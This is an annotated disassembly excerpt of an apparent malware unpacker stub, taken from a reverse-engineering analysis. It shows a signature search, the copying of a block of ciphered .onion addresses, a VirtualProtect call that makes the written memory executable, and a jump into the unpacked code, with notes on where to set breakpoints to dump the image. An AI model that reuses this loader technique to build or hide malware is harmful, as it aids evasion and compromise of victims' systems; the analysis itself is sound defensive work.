seg000:00C1249E jnz short loc_C124C1
seg000:00C124A0 cmp dword ptr [esi+8], 21232D67h ; 'g-#!' => full signature '!-#cfgbeg-#!'
seg000:00C124A7 jnz short loc_C124C1
seg000:00C124A9 mov eax, [ebp-0Ch]
seg000:00C124AC add eax, esi            ; EAX = RVA following the signature
seg000:00C124AE lea edx, [ecx-4]        ; EDX = last RVA where an 'END!' DWORD fits
seg000:00C124B1 jmp short loc_C124BD
seg000:00C124B3 ; ---------------------------------------------------------------------------
seg000:00C124B3
seg000:00C124B3 loc_C124B3: ; CODE XREF: seg000:00C124BF
seg000:00C124B3 cmp dword ptr [ebx+eax], 21444E45h ; 'END!'
seg000:00C124BA jz short loc_C124CC
seg000:00C124BC inc eax
seg000:00C124BD
seg000:00C124BD loc_C124BD: ; CODE XREF: seg000:00C124B1
seg000:00C124BD cmp eax, edx
seg000:00C124BF jb short loc_C124B3     ; Byte-by-byte search for 'END!' after the signature
seg000:00C124C1
seg000:00C124C1 loc_C124C1: ; CODE XREF: seg000:00C12495
seg000:00C124C1 ; seg000:00C1249E ...
seg000:00C124C1 inc dword ptr [ebp-4]   ; Also reached when the signature matched but no 'END!' followed
seg000:00C124C4 inc esi
seg000:00C124C5 cmp [ebp-4], edi
seg000:00C124C8 jb short loc_C1248C
seg000:00C124CA jmp short loc_C124E0    ; Not found: skip the copy
seg000:00C124CC
seg000:00C124CC
seg000:00C124CC
seg000:00C124CC ;*****************************************************************************
seg000:00C124CC ;* Pick a block in 0x4A439A, ie in the payload in the .rsrc and copy it in the
seg000:00C124CC ;* signature block (block copied contains ciphered .onion addresses)
seg000:00C124CC ;*****************************************************************************
seg000:00C124CC loc_C124CC: ; CODE XREF: seg000:00C124BA
seg000:00C124CC sub eax, [ebp-4]        ; EAX=0x84 (difference between signature and "END!"); [ebp-4] = ESI-base, so EAX = RVA of 'END!' - RVA of the signature
seg000:00C124CF add eax, 4              ; + the 'END!' DWORD itself
seg000:00C124D2 mov [ebp-10h], eax      ; [ebp-10h] is reused: it now holds the copy length
seg000:00C124D5 mov esi, [ebp+10h]      ; ESI=0x4A439A (third stack argument)
seg000:00C124D8 mov edi, [ebp-14h]      ; EDI=0xE931B0 (ie signature '!-#cfgbeg-#!')
seg000:00C124DB mov ecx, [ebp-10h]      ; ECX=0x88
seg000:00C124DE rep movsb               ; Overwrites signature..'END!' with the payload block; the length is bounded by the 'END!' search (<= size-4), the source is not checked here
seg000:00C124E0
seg000:00C124E0 loc_C124E0: ; CODE XREF: seg000:00C1247E
seg000:00C124E0 ; seg000:00C124CA
seg000:00C124E0 lea eax, [ebp+0Ch]
seg000:00C124E3 push eax                ; lpOldProtect = [EBP+0Ch] (the second stack argument's slot is reused as scratch)
seg000:00C124E4 mov eax, [ebp-8]        ; EAX=0xB70000
seg000:00C124E7 push 20h                ; newProtect = 0x20 = PAGE_EXECUTE_READ
seg000:00C124E9 push dword ptr [eax+0Ch] ; size = 0x0E4709 (header field +0Ch, also the bound used at C123D9)
seg000:00C124EC mov eax, [ebp+8]        ; EAX = 0x40100 (first stack argument; [EAX+8] is called as VirtualProtect)
seg000:00C124EF push ebx                ; lpAddress = EBX = 0xD90000
seg000:00C124F0 call dword ptr [eax+8]  ; 0x7C801AD4 => VirtualProtect ();
seg000:00C124F0 ; W->X transition: the region was written to (rep stosb, relocations, rep movsb) and
seg000:00C124F0 ; is made executable here right before being called. A breakpoint on this call or
seg000:00C124F0 ; on the call eax below captures the fully relocated image (import and relocation
seg000:00C124F0 ; tables are already wiped at this point).
seg000:00C124F3 mov eax, [ebp-8]        ; EAX=0xB70000
seg000:00C124F6 mov eax, [eax+8]        ; EAX = 0x03368D (header field +8, presumably the entry point RVA of the unpacked code)
seg000:00C124F9 add eax, ebx            ; EAX = 0xDC368D
seg000:00C124FB call eax                ; ======> 0xDC368D : transfer of control to the unpacked code
seg000:00C124FD pop edi
seg000:00C124FE pop esi
seg000:00C124FF pop ebx
seg000:00C12500 leave
seg000:00C12501 retn 0Ch                ; stdcall, 3 DWORD arguments ([ebp+8], [ebp+0Ch], [ebp+10h])
seg000:00C12504
seg000:00C12504
seg000:00C12504
seg000:00C12504 ; **********************************************************
seg000:00C12504 ; * Entering by here !!! *
seg000:00C12504 ; **********************************************************
seg000:00C12504 ; Entry stub: a single backward jump to loc_C122A6 (above this excerpt)
seg000:00C12504
seg000:00C12504 jmp loc_C122A6
seg000:00C12504 ; ---------------------------------------------------------------------------